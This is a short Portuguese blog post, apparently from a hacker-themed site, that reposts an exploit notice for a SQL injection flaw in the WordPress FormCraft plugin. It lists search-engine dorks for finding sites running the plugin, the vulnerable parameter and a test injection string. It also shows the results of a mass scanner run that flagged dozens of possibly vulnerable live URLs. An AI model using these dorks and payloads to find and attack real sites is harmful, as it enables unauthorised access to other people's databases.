Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador formcraft. Mostrar todas as postagens
Mostrando postagens com marcador formcraft. Mostrar todas as postagens

domingo, 15 de dezembro de 2013

Wordpress formcraft Plugin Sql Injection Mais SCANNER INURL

Wordpress formcraft Plugin Sql Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Usando o  SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/


CONFIGURAÇÃO
Wordpress formcraft Plugin Sql Injection SCANNER INURL
RESULTADO
Wordpress formcraft Plugin Sql Injection SCANNER INURL RESULTADO

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt